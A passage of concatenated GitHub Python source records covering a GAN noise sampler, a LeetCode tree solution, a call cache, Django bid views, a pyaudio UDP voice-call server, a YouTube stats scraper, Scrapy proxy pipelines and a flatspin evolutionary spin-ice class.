reload_catalog()\n","repo_name":"WasteLabs/template_kedro_streamlit","sub_path":"src/dashboards/kedro_wrapper/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"70965643074","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom pygan.noisesampler.image_noise_sampler import ImageNoiseSampler\nfrom pydbm.cnn.featuregenerator.image_generator import ImageGenerator\nfrom pydbm.cnn.layerablecnn.convolution_layer import ConvolutionLayer\nfrom pydbm.synapse.cnn_graph import CNNGraph\nfrom pydbm.activation.tanh_function import TanhFunction\n\n\nclass ConvolveImageNoiseSampler(ImageNoiseSampler):\n '''\n Sampler which draws samples from the noise prior of images\n and has convolution operator to convolve sampled image data.\n\n This sampler will not learn as CNNs model\n but *condition* input noise.\n '''\n\n def __init__(\n self,\n batch_size,\n image_dir,\n seq_len=None,\n gray_scale_flag=True,\n wh_size_tuple=(100, 100),\n norm_mode=\"z_score\"\n ):\n '''\n Init.\n\n Args:\n training_image_dir: Dir path which stores image files for training.\n test_image_dir: Dir path which stores image files for test.\n seq_len: The length of one sequence.\n gray_scale_flag: Gray scale or not(RGB).\n wh_size_tuple: Tuple(`width`, `height`).\n norm_mode: How to normalize pixel values of images.\n - `z_score`: Z-Score normalization.\n - `min_max`: Min-max normalization.\n - `tanh`: Normalization by tanh function.\n\n '''\n super().__init__(\n batch_size=batch_size,\n image_dir=image_dir,\n seq_len=seq_len,\n gray_scale_flag=gray_scale_flag,\n wh_size_tuple=wh_size_tuple,\n norm_mode=norm_mode\n )\n\n if gray_scale_flag is True:\n channel = 1\n else:\n channel = 3\n\n self.__conv_layer = ConvolutionLayer(\n CNNGraph(\n activation_function=TanhFunction(),\n filter_num=batch_size,\n channel=channel,\n kernel_size=3,\n scale=0.1,\n stride=1,\n pad=1\n )\n )\n\n def generate(self):\n '''\n Draws samples from the `true` distribution.\n \n Returns:\n `np.ndarray` of samples.\n '''\n observed_arr = super().generate()\n return self.__conv_layer.convolve(observed_arr)\n\n def get_conv_layer(self):\n ''' getter '''\n return self.__conv_layer\n \n def set_conv_layer(self, value):\n ''' setter '''\n self.__conv_layer = value\n \n conv_layer = property(get_conv_layer, set_conv_layer)\n","repo_name":"Flipkickisreal/Hackathon2020Team3","sub_path":"library/accel-brain-code-master/accel-brain-code-master/Generative-Adversarial-Networks/pygan/noisesampler/imagenoisesampler/convolve_image_noise_sampler.py","file_name":"convolve_image_noise_sampler.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3017444599","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def constructMaximumBinaryTree(self, nums: List[int]) -> TreeNode:\n \n if nums is None or len(nums) == 0:\n return None\n \n if len(nums) == 1:\n return TreeNode(nums[0])\n \n index = -1\n \n for i in range(len(nums)):\n if index == -1 or nums[i] > nums[index]:\n index = i\n \n node = TreeNode(nums[index])\n \n node.left = self.constructMaximumBinaryTree(nums[0:index])\n node.right = self.constructMaximumBinaryTree(nums[index + 1:])\n \n return node\n\n","repo_name":"lugy-bupt/algorithm","sub_path":"leet/0654-maximum-binary-tree/maximum-binary-tree.py","file_name":"maximum-binary-tree.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"29370236659","text":"import logging\nfrom ..funcutils import get_function_id\nimport dill as pickle\nfrom IPython import embed\n\nfrom ..utils import create_temp_dir\nfrom ..calltypes import Call, Return\nfrom typing import Dict, Tuple, List\nimport opcode\n\nlogger = logging.getLogger(__name__)\n\nfrom .base import BaseCache\n\nclass MemCache(BaseCache):\n def __init__(self):\n super().__init__()\n # this value is going to be used to help us keep track of a specific function, so we can join up a call and return object\n self._call_id_cache: Dict[Tuple, List] = {}\n\n def __getstate__(self):\n return self._cache\n\n def __setstate__(self, state):\n self._cache = state\n\n def __ensure_cache(self, func_id):\n if func_id not in self.cache:\n logger.debug(f\"Adding new function id mapping for {func_id}\")\n self._cache[func_id] = []\n\n def save(self, obj):\n '''\n Save a call/return object to the cache\n\n Args:\n obj (Call, Return): the call/return object to save to the cache\n \n Returns:\n None\n '''\n\n self.__ensure_cache(obj.id)\n logger.debug(f\"Inserting new item into cache from save: {obj}\")\n self._cache[obj.id].append(obj) \n\n def buffered_call_return_save(self, invocation_id, obj):\n '''\n Save a call/return object to the cache\n Items saved in this manner are going to be stored in a {'call': Call, 'return': Return} dict so you can see exactly what the return values are for each call\n Also, this method is nice because you can run it with multithreading or whatever concurrency, and it will be fine. The only time that things get added to the cache \n with this method is when both the call and return objects are present, so be conscious of that\n\n Args:\n invocation_id (str): a unique id to the particular invocation of a function. This value should be the same when the call and return values of the same instance of a function invocation are performed\n obj (Call, Return): the call/return object to save to the cache\n \n Returns:\n None\n\n Raises:\n AssertionError\n '''\n\n if isinstance(obj, Call):\n assert invocation_id not in self._call_id_cache, \"Got invocation_id collision!\"\n logger.debug(f\"Adding new invocation id mapping for {invocation_id}\")\n self._call_id_cache[invocation_id] = obj\n\n elif isinstance(obj, Return): \n assert invocation_id in self._call_id_cache, \"for some reason, we are trying to return from a function but we cant find the call object\"\n self.__ensure_cache(obj.id)\n item = {\n 'call': self._call_id_cache[invocation_id], \n 'return': obj\n }\n self._cache[obj.id].append(item)\n logger.debug(f\"Inserting new item into cache: {item}\")\n del self._call_id_cache[invocation_id] \n logger.debug(f\"Deleting invocation id mapping for {invocation_id}\")\n\n\n @property\n def cache(self):\n '''\n Return the full cache\n\n Returns:\n dict: the full cache\n '''\n return self._cache\n \n \n def get_cache_for_func(self, func_id):\n '''\n Given a function id (see get_function_id), return the cache for that function\n\n Args:\n func_id (str): the function id\n \n Returns:\n list: the cache for the function\n '''\n\n return self._cache[func_id]\n \n\n def save_to_file(self, filename: str):\n '''\n Save the cache to a file\n\n Args:\n filename (str): the filename to save the cache to\n\n Returns:\n None\n '''\n\n with open(filename, 'wb') as f:\n pickle.dump(self, f)","repo_name":"fuzzingai/callcache","sub_path":"callcache/cache/mem.py","file_name":"mem.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22802074422","text":"# 读文件\r\n# 1.打开文件\r\nfp = open('f2.txt','w')\r\n\r\n# 2 写字符串到文件\r\n# 可以把字符串写入文件\r\n# fp.write(\"鲲之大,一锅炖不下,\")\r\na = ['hello\\n','world\\n','welcome to beijing\\n','毒死\\n']\r\n# 把字符串列表写入文件\r\nfp.writelines(a)\r\n# 3.关闭文件\r\nfp.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zhenguo96/test1","sub_path":"Python基础笔记/15/代码/9.写文件.py","file_name":"9.写文件.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25168421694","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, parser_classes\nfrom rest_framework.parsers import JSONParser\nfrom . serializers import PostPetBidSerializer, GetBidsOfPetPerOwnerSerlaizer\nfrom django.db import IntegrityError\nfrom . models import Pet\n\n\n'''\nNeed some permissions\n'''\n@api_view(['POST'])\n@parser_classes([JSONParser])\ndef user_bid_on_pet(request):\n try :\n bid_data_serializer = PostPetBidSerializer(data=request.data)\n if bid_data_serializer.is_valid():\n bid_data_serializer.save()\n return Response(bid_data_serializer.data, status=status.HTTP_201_CREATED)\n return Response(bid_data_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n except IntegrityError as e:\n return Response(str(e), status=status.HTTP_406_NOT_ACCEPTABLE)\n\n\n'''\nNeed some permissions\n'''\n@api_view(['GET'])\n@parser_classes([JSONParser])\ndef get_bids_of_pet_per_owner(request):\n try :\n id=request.data['pet_id']\n pet = Pet.objects.get(id=id)\n bids_data_serializer = GetBidsOfPetPerOwnerSerlaizer(pet, many=False)\n return Response(bids_data_serializer.data, status=status.HTTP_200_OK)\n \n except Pet.DoesNotExist:\n return Response(\"There is no bid for this pet\", status=status.HTTP_404_NOT_FOUND)\n except KeyError as e:\n return Response(\"Please provide a valid: \" + str(e), status=status.HTTP_400_BAD_REQUEST)","repo_name":"DevHwary/camList_task","sub_path":"petstore_project/bid_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7047701995","text":"import threading\r\nfrom socket import *\r\nfrom tkinter import INSERT, END\r\n\r\nimport pyaudio\r\n\r\n\r\ndef finalizaConexao(busy):\r\n try:\r\n if busy.flag['online']:\r\n servidorUdp.sendto(\"encerrar_ligacao\".encode(), origem_call)\r\n busy.flag['online'] = False\r\n except:\r\n pass\r\n\r\n\r\ndef iniciarServidorLigacao(meuIp, callback, endcallbtn, busy, console, connectbtn):\r\n global servidorUdp\r\n global origem_call\r\n global output_stream\r\n busy.flag['online'] = False\r\n HOST = meuIp\r\n PORT = 6000\r\n servidorUdp = socket(AF_INET, SOCK_DGRAM)\r\n origem = (HOST, PORT)\r\n servidorUdp.bind(origem)\r\n write(console, \"Iniciando servidor de ligação\")\r\n py_audio = pyaudio.PyAudio()\r\n buffer = 4096 # 127.0.0.1\r\n output_stream = py_audio.open(format=pyaudio.paInt16, output=True, rate=44100, channels=2, frames_per_buffer=buffer)\r\n while True:\r\n msg, origem_call = servidorUdp.recvfrom(4096)\r\n if \"convite\" in str(msg):\r\n if busy.flag['online']:\r\n servidorUdp.sendto(\"resposta_ao_convite/ocupado\".encode(), origem_call)\r\n else:\r\n split = str(msg).split('/')\r\n resp = callback(origem_call, split[1])\r\n if \"s\" in resp:\r\n write(console, \"Convite Aceito\")\r\n write(console, \"Começando ligação...\")\r\n output_stream = py_audio.open(format=pyaudio.paInt16, output=True, rate=44100, channels=2, frames_per_buffer=buffer)\r\n servidorUdp.sendto(\"resposta_ao_convite/aceito\".encode(), origem_call)\r\n busy.flag['online'] = True\r\n endcallbtn['state'] = \"active\"\r\n connectbtn['state'] = \"disabled\"\r\n thread2 = threading.Thread(target=enviarAudio, args=(busy,endcallbtn,console, connectbtn))\r\n thread2.start()\r\n elif \"n\" in resp:\r\n servidorUdp.sendto(\"resposta_ao_convite/rejeitado\".encode(), origem_call)\r\n elif \"encerrar_ligacao\" in str(msg):\r\n busy.flag['online'] = False\r\n endcallbtn['state'] = \"disabled\"\r\n connectbtn['state'] = \"active\"\r\n elif busy.flag['online']:\r\n output_stream.write(msg)\r\n\r\n\r\ndef enviarAudio(busy,endcallbtn,console,connectbtn):\r\n global py_audio\r\n global input_stream\r\n py_audio = pyaudio.PyAudio()\r\n buffer = 1024\r\n input_stream = py_audio.open(format=pyaudio.paInt16, input=True, rate=44100, channels=2, frames_per_buffer=buffer)\r\n while busy.flag['online']:\r\n data = input_stream.read(buffer)\r\n servidorUdp.sendto(data, origem_call)\r\n busy.flag['online'] = False\r\n endcallbtn['state'] = \"disabled\"\r\n connectbtn['state'] = \"active\"\r\n write(console, \"Ligacao finalizada\")\r\n input_stream.stop_stream()\r\n input_stream.close()\r\n output_stream.stop_stream()\r\n output_stream.close()\r\n py_audio.terminate()\r\n\r\ndef write(console, *message, end = \"\\n\", sep = \" \"):\r\n text = \"\"\r\n for item in message:\r\n text += \"{}\".format(item)\r\n text += sep\r\n text += end\r\n console.insert(INSERT, text)\r\n console.see(END)\r\n","repo_name":"bernardocerq/redes","sub_path":"REDES-final/serverLigacao.py","file_name":"serverLigacao.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11822492408","text":"from googleapiclient.discovery import build\nimport config\nimport util\nimport argparse\nimport os\n\nyoutube = build('youtube', 'v3', developerKey=os.environ['API_KEY'])\n\n\ndef get_channel_videos(channel_id):\n \"\"\"Fetch the list of videos present under the channel id.\n \n :param channel_id: youtube channel id of the user\n :return : list of videos\n \n \"\"\"\n res = youtube.channels().list(id=channel_id,\n part='contentDetails').execute()\n playlist_id = res['items'][0]['contentDetails']['relatedPlaylists']['uploads']\n videos = []\n next_page_token = None\n\n while 1:\n res = youtube.playlistItems().list(playlistId=playlist_id,\n part='snippet',\n maxResults=50,\n pageToken=next_page_token).execute()\n videos += res['items']\n next_page_token = res.get('nextPageToken')\n\n if next_page_token is None:\n break\n\n return videos\n\n\ndef get_videos_stats(video_id):\n \"\"\"Fetch the statistics corresponding to the provided video id. \n \n :param video_id : youtube video id\n :return stats: statistics of video\n \"\"\"\n stats = []\n for i in range(0, len(video_id)):\n res = youtube.videos().list(id=video_id[i],\n part='statistics').execute()\n stats += res['items']\n\n return stats\n\n\ndef video_table(list_of_videos):\n \"\"\"Fetch the list of videos present under the channel id.\n \n :param channel_id: youtube channel id of the user\n :return : list of videos\n \"\"\"\n for video in list_of_videos:\n config.channel_id.append(video['snippet']['channelId'])\n config.channel_name.append(video['snippet']['channelTitle'])\n config.video_id.append(video['snippet']['resourceId']['videoId'])\n config.video_type.append(video['snippet']['resourceId']['kind'])\n config.video_title.append(video['snippet']['title'])\n config.video_description.append(video['snippet']['description'])\n config.publishedAt.append(video['snippet']['publishedAt'])\n\n\ndef stat_table(video_stats):\n \"\"\"Joins all the required columns.\n \n :param video_stats : list of videos \n :return : no value \n \"\"\"\n for stat in video_stats:\n if util.key_in_dict_and_not_none(stat['statistics'], \"viewCount\"):\n config.view_count.append(stat['statistics']['viewCount'])\n else:\n config.view_count.append(0)\n if util.key_in_dict_and_not_none(stat['statistics'], \"likeCount\"):\n config.like_count.append(stat['statistics']['likeCount'])\n else:\n config.like_count.append(0)\n if util.key_in_dict_and_not_none(stat['statistics'], \"dislikeCount\"):\n config.dislike_count.append(stat['statistics']['dislikeCount'])\n else:\n config.dislike_count.append(0)\n if util.key_in_dict_and_not_none(stat['statistics'], \"favoriteCount\"):\n config.favoriteCount.append(stat['statistics']['favoriteCount'])\n else:\n config.favoriteCount.append(0)\n if util.key_in_dict_and_not_none(stat['statistics'], \"commentCount\"):\n config.commentCount.append(stat['statistics']['commentCount'])\n else:\n config.commentCount.append(0)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--output_dir\",\n type=str,\n )\n\n parser.add_argument(\n \"--channel_id\",\n type=str\n )\n\n args = parser.parse_args()\n\n list_of_videos = get_channel_videos(args.channel_id)\n video_table(list_of_videos)\n video_stats = get_videos_stats(config.video_id)\n stat_table(video_stats)\n util.write_output(zip(config.channel_id, config.channel_name,\n config.video_id, config.video_type, config.video_title,\n config.video_description, config.view_count, config.like_count,\n config.dislike_count, config.favoriteCount, config.commentCount,\n config.publishedAt),\n config.channel_name[0],\n args.output_dir)\n","repo_name":"Ravineesh/YouTubeGrabber","sub_path":"src/channel_stats.py","file_name":"channel_stats.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74640010114","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport pymongo\nfrom scrapy.exceptions import NotConfigured\n\n#保存fresh代理\nclass MongoFreshProxyPipeline(object):\n \n #fresh_proxy保存新代理,会自动过期\n collection_name = 'fresh_proxy'\n \n #fresh_proxy中元素过期时间(s)\n expire_time = 600\n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n \n @classmethod\n def from_crawler(cls, crawler):\n if not crawler.settings.getbool('MONGO_FRESHPROXY_PIPELINE_ENABLED'):\n # if this isn't specified in settings, the pipeline will be completely disabled\n raise NotConfigured\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DATABASE', 'items')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n col = self.db[self.collection_name]\n col.create_index(\"createtime\",expireAfterSeconds=self.expire_time)\n\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n result = self.db[self.collection_name].find_one({'_id': item['_id']})\n if result:\n self.db[self.collection_name].replace_one({'_id': item['_id']}, item)\n else:\n self.db[self.collection_name].insert_one(item)\n return item\n\n#保存stable代理\nclass MongoStableProxyPipeline(object):\n \n #fresh_proxy保存新代理,会自动过期\n fresh_collection = 'fresh_proxy'\n stable_collection = 'stable_proxy'\n\n new_stable_proxies = []\n \n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n \n @classmethod\n def from_crawler(cls, crawler):\n if not crawler.settings.getbool('MONGO_STABLEPROXY_PIPELINE_ENABLED'):\n # if this isn't specified in settings, the pipeline will be completely disabled\n raise NotConfigured\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DATABASE', 'items')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n spider.pipeline = self\n\n def close_spider(self, spider):\n #替换全部stable_collection的内容\n self.db[self.stable_collection].delete_many({})\n #去重\n seen_ids = set()\n new_proxies = []\n for p in self.new_stable_proxies:\n if p['_id'] not in seen_ids:\n new_proxies.append(p)\n seen_ids.add(p['_id'])\n print(new_proxies)\n self.db[self.stable_collection].insert_many(new_proxies)\n self.client.close()\n \n #返回 fresh/stable中的全部代理地址\n def listProxy(self):\n stable_proxies = self.db[self.stable_collection].find({})\n fresh_proxies = self.db[self.fresh_collection].find({})\n proxies = []\n for sp in stable_proxies:\n proxies.append(sp)\n for fp in fresh_proxies:\n proxies.append(fp)\n return proxies \n\n def process_item(self, item, spider):\n self.new_stable_proxies.append(item) \n return item \n","repo_name":"xianfengsong/freeProxy","sub_path":"freeProxy/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26574783218","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom itertools import count\nimport os\nimport sys\nimport logging\nfrom copy import deepcopy\n\nfrom flatspin.model import TileLatticeSpinIce\n\nfrom base_individual import Base_Individual\nimport fitness_functions\nimport evo_alg as ea\n\n\nclass Individual(Base_Individual):\n _id_counter = count(0)\n basis_min = 0.5\n basis_max = 1.1\n min_angle_offset = np.deg2rad(45)\n\n def __init__(self, *, lattice_shape=(10, 10), basis0_len=None, basis0_angle=None, basis1_len=None, basis1_angle=None, id=None, gen=0,\n angle_tile_map=None, angle_tile_shape=(3, 3), angle_tile_max_dim=None, angle_table=None, num_angles=None,\n hole_tile=None, hole_tile_shape=None, hole_tile_max_dim=None, min_holes=None, max_holes=None, parent_ids=None, min_magnets=None, **kwargs):\n self.gen = gen\n self._lattice_shape = lattice_shape\n self.min_magnets = min_magnets\n\n if parent_ids is None:\n self.parent_ids = []\n else:\n self.parent_ids = parent_ids\n\n self.id = next(self._id_counter) if id is None else id\n\n self.basis0_len = basis0_len if basis0_len is not None else random_range(Individual.basis_min, Individual.basis_max)\n self.basis0_angle = basis0_angle if basis0_angle is not None else random_range(0, np.pi)\n self.basis1_len = basis1_len if basis1_len is not None else random_range(Individual.basis_min, Individual.basis_max)\n self.basis1_angle = basis1_angle if basis1_angle is not None else random_range(Individual.min_angle_offset, np.pi - Individual.min_angle_offset)\n\n if angle_tile_map is not None:\n angle_tile_map = np.array(angle_tile_map) if not isinstance(angle_tile_map, np.ndarray) else angle_tile_map\n angle_tile_shape = angle_tile_map.shape\n else:\n if angle_tile_max_dim is not None:\n angle_tile_shape = (np.random.randint(1, angle_tile_max_dim + 1), np.random.randint(1, angle_tile_max_dim + 1))\n self.angle_tile_shape = angle_tile_shape\n self.angle_tile_max_dim = angle_tile_max_dim\n\n self.num_angles = num_angles\n self.angle_tile_map = angle_tile_map if angle_tile_map is not None else (\n np.random.randint(0, self.num_angles or np.prod(self.angle_tile_shape), size=self.angle_tile_shape)\n )\n\n self.angle_table = angle_table if angle_table is not None else random_range(0, 2 * np.pi, shape=(self.num_angles or np.prod(self.angle_tile_shape),))\n\n if hole_tile is not None:\n hole_tile = np.array(hole_tile) if not isinstance(hole_tile, np.ndarray) else hole_tile\n self.hole_tile_shape = hole_tile.shape\n self.hole_tile = hole_tile\n else:\n if hole_tile_max_dim is not None:\n hole_tile_shape = (np.random.randint(1, hole_tile_max_dim + 1), np.random.randint(1, hole_tile_max_dim + 1))\n self.hole_tile_shape = hole_tile_shape if hole_tile_shape is not None else self.angle_tile_shape\n self.hole_tile_max_dim = hole_tile_max_dim\n self._max_holes = max_holes\n\n self._min_holes = min_holes\n\n if hole_tile is None:\n num_holes = np.random.randint(self.min_holes, (self.max_holes) + 1)\n self.hole_tile = np.random.permutation(np.concatenate((np.zeros(num_holes), np.ones(np.prod(self.hole_tile_shape) - num_holes)))).reshape(self.hole_tile_shape)\n\n self.hole_tile = self.hole_tile.astype(int)\n self.fitness = None\n self.fitness_components = []\n self.fitness_info = []\n self._as_asi = None\n\n self.init_evolved_params(**kwargs)\n # assert self.num_magnets(self.lattice_shape) == len(self.angles), f\"Number of magnets ({self.num_magnets(self.lattice_shape)}) does not match number of angles ({len(self.angles)})\"\n\n def is_in_bounds(self, point):\n return 0 <= point[0] <= self.pheno_bounds[0] and 0 <= point[1] <= self.pheno_bounds[1]\n\n def plot(self, **kwargs):\n self.as_ASI.plot(**kwargs)\n\n def num_magnets(self, lattice_shape=None):\n if lattice_shape is None:\n lattice_shape = self._lattice_shape\n\n div = (lattice_shape[0] // self.hole_tile_shape[0], lattice_shape[1] // self.hole_tile_shape[1])\n remainder = (lattice_shape[0] % self.hole_tile_shape[0], lattice_shape[1] % self.hole_tile_shape[1])\n\n total = np.sum(self.hole_tile) * div[0] * div[1]\n total += np.sum(self.hole_tile[:remainder[0], :] * div[1])\n total += np.sum(self.hole_tile[:, :remainder[1]] * div[0])\n total += np.sum(self.hole_tile[:remainder[0], :remainder[1]])\n\n return total\n\n @property\n def lattice_shape(self):\n \"\"\"Returns the lattice shape, increasing it if necessary to satisfy the minimum number of magnets.\"\"\" \n if self.min_magnets is None:\n return self._lattice_shape\n\n num_mags = self.num_magnets()\n if num_mags >= self.min_magnets:\n return self._lattice_shape\n\n even_shape = (self._lattice_shape[0] - (self._lattice_shape[0] % self.hole_tile_shape[0]),\n self._lattice_shape[1] - (self._lattice_shape[1] % self.hole_tile_shape[1])) # make hole_tile fit exactly into lattice_shape\n b = np.sum(even_shape)\n c = self.num_magnets(even_shape) - self.min_magnets\n base_increase = int(np.ceil((-b + np.sqrt(b * b - 4 * c)) / 2))\n bi_x = base_increase * self.hole_tile_shape[0]\n bi_y = base_increase * self.hole_tile_shape[1]\n increase = 0\n while self.num_magnets((self._lattice_shape[0] + bi_x + increase, self._lattice_shape[1] + bi_y + increase)) < self.min_magnets:\n increase += 1\n assert increase <= np.max(self.hole_tile.shape) + 1, f\"Increase {increase} + {base_increase} + {np.max(self.hole_tile.shape)} is too large for hole_tile_shape {self.hole_tile.shape}\"\n return (self._lattice_shape[0] + bi_x + increase, self._lattice_shape[1] + bi_y + increase)\n\n\n @property\n def basis0(self):\n return (self.basis0_len * np.array((np.cos(self.basis0_angle), np.sin(self.basis0_angle))))\n\n @property\n def basis1(self):\n b1_angle = self.basis1_angle + self.basis0_angle\n return (self.basis1_len * np.array((np.cos(b1_angle), np.sin(b1_angle))))\n\n @property\n def angle_tile(self):\n return self.angle_table[self.angle_tile_map]\n\n @property\n def min_holes(self):\n if self._min_holes is None:\n return 0\n if 0 < self._min_holes < 1: # Fraction of holes\n return int(min(np.round(self._min_holes * np.prod(self.hole_tile_shape)), np.prod(self.hole_tile_shape) - 1))\n\n return int(self._min_holes)\n @property\n def max_holes(self):\n if self._max_holes is None:\n return int(np.prod(self.hole_tile_shape) - 1)\n\n if 0 < self._max_holes < 1: # Fraction of holes\n return int(min(np.round(self._max_holes * np.prod(self.hole_tile_shape)), np.prod(self.hole_tile_shape) - 1))\n\n return int(self._max_holes)\n\n @property\n def as_ASI(self):\n return TileLatticeSpinIce(basis0=self.basis0, basis1=self.basis1, angle_tile=self.angle_tile, hole_tile=self.hole_tile, radians=True, size=self.lattice_shape)\n\n\n @property\n def coords(self):\n return self.as_ASI.pos\n\n @property\n def angles(self):\n return self.as_ASI.angle\n\n def reset(self):\n self.fitness = None\n self.fitness_components = []\n self.fitness_info = []\n self._as_asi = None\n\n # ======= Mutation helpers =======================================================\n\n @staticmethod\n def gaussian_mutation(values, std, low=None, high=None, ignore_negative=False):\n negatives = values * (values < 0) if ignore_negative else None\n values = np.random.normal(values, std)\n if low is not None:\n values = np.maximum(values, low)\n if high is not None:\n values = np.minimum(values, high)\n\n if negatives is not None: # restore negatives\n values = values * (negatives == 0) + negatives\n\n return values\n\n @staticmethod\n def swap_mutation(collection):\n if np.ndim(collection) < 2:\n i, j = np.random.choice(len(collection), 2, replace=False)\n collection[i], collection[j] = collection[j], collection[i]\n else:\n flat = np.array(collection).flatten()\n i, j = np.random.choice(len(flat), 2, replace=False)\n flat[i], flat[j] = flat[j], flat[i]\n collection = flat.reshape(collection.shape)\n return collection\n\n @staticmethod\n def mutate_bases(child, strength):\n mag_std = (Individual.basis_max - Individual.basis_min) * strength * 0.01\n angle_std = (2 * np.pi) * strength * 0.01\n child.basis0_len = Individual.gaussian_mutation(child.basis0_len, mag_std, low=Individual.basis_min, high=Individual.basis_max)\n child.basis0_angle = Individual.gaussian_mutation(child.basis0_angle, angle_std, low=0, high=2 * np.pi)\n\n child.basis1[0] = Individual.gaussian_mutation(child.basis1[0], mag_std, low=Individual.basis_min, high=Individual.basis_max)\n child.basis1[1] = Individual.gaussian_mutation(child.basis1[1], angle_std, low=Individual.min_angle_offset, high=np.pi - Individual.min_angle_offset)\n return child\n\n @ staticmethod\n def mutate_angle_table(child, strength):\n std = strength * 0.05\n child.angle_table = Individual.gaussian_mutation(child.angle_table, std=std, low=0, high=np.pi * 2)\n\n @ staticmethod\n def mutate_hole_tile(child, strength):\n if child.hole_tile_max_dim not in (None, 1) and np.random.rand() < 0.25:\n child._mutate_hole_tile_shape(strength)\n else:\n chance = min(strength * 0.05, 0.5)\n flat = child.hole_tile.flatten()\n holes = np.nonzero(flat == 0)[0]\n not_holes = np.nonzero(flat)[0]\n\n flippable_0 = np.random.choice(holes, len(holes) - child.min_holes, replace=False)\n flippable_1 = np.random.choice(not_holes, child.max_holes - len(holes), replace=False)\n flippable = np.concatenate((flippable_0, flippable_1))\n np.random.shuffle(flippable)\n do_flip = np.concatenate((np.ones(1), np.random.rand(len(flippable) - 1) < chance)).astype(bool)\n flat[flippable[do_flip]] = ~flat[flippable[do_flip]].astype(bool)\n child.hole_tile = flat.reshape(child.hole_tile.shape)\n assert child.min_holes <= np.sum(child.hole_tile == 0) <= child.max_holes, \"Holes mutated out of bounds\"\n\n def _mutate_hole_tile_shape(self, strength):\n assert self.hole_tile_max_dim not in (None, 1), \"Cannot mutate hole tile shape if max dim is 1\"\n dim = np.random.randint(0, 2)\n shape = list(self.hole_tile.shape)\n if shape[dim] == 1 or (np.random.rand() < 0.5 and shape[dim] <= self.hole_tile_max_dim):\n # make bigger in dim\n shape[dim] += 1\n new_tile = np.random.rand(*shape) < 0.5\n new_tile[:self.hole_tile.shape[0], :self.hole_tile.shape[1]] = self.hole_tile\n else:\n # make smaller in dim\n shape[dim] -= 1\n new_tile = self.hole_tile[:shape[0], :shape[1]]\n\n self.hole_tile = new_tile\n self.hole_tile_shape = new_tile.shape\n self._fix_holes()\n\n def _fix_holes(self):\n \"\"\"Ensure that the number of holes is within the bounds\"\"\"\n num_holes = np.sum(self.hole_tile == 0)\n if num_holes < self.min_holes:\n self.hole_tile[np.random.choice(np.nonzero(self.hole_tile)[0], self.min_holes - num_holes, replace=False)] = 0\n elif num_holes > self.max_holes:\n self.hole_tile[np.random.choice(np.nonzero(self.hole_tile == 0)[0], num_holes - self.max_holes, replace=False)] = 1\n self.hole_tile = self.hole_tile.astype(int)\n\n @staticmethod\n def mutate_angle_tile_map(child, strength):\n if child.angle_tile_max_dim not in (None, 1) and np.random.rand() < 0.333: # mutate shape\n child._mutate_angle_tile_shape(strength)\n elif np.random.rand() < 0.5 and np.prod(child.angle_tile_shape) > 1: # swap angles\n child.angle_tile_map = Individual.swap_mutation(child.angle_tile_map)\n else: # point mutation\n child.angle_tile_map.flat[np.random.randint(0, len(child.angle_tile_map.flat))] = np.random.randint(0, child.num_angles or np.prod(child.angle_tile_shape))\n\n def _mutate_angle_tile_shape(self, strength):\n assert self.angle_tile_max_dim not in (None, 1), \"Cannot mutate shape if max dim is 1\"\n dim = np.random.randint(0, 2)\n shape = list(self.angle_tile_shape)\n if shape[dim] == 1 or (np.random.rand() < 0.5 and shape[dim] <= self.angle_tile_max_dim):\n # make bigger in dim\n shape[dim] += 1\n new_map = np.random.randint(0, self.num_angles or np.prod(shape), size=shape)\n new_map[:self.angle_tile_shape[0], :self.angle_tile_shape[1]] = self.angle_tile_map\n else:\n # make smaller in dim\n shape[dim] -= 1\n new_map = self.angle_tile_map[:shape[0], :shape[1]]\n self.angle_tile_shape = tuple(shape)\n self.angle_tile_map = 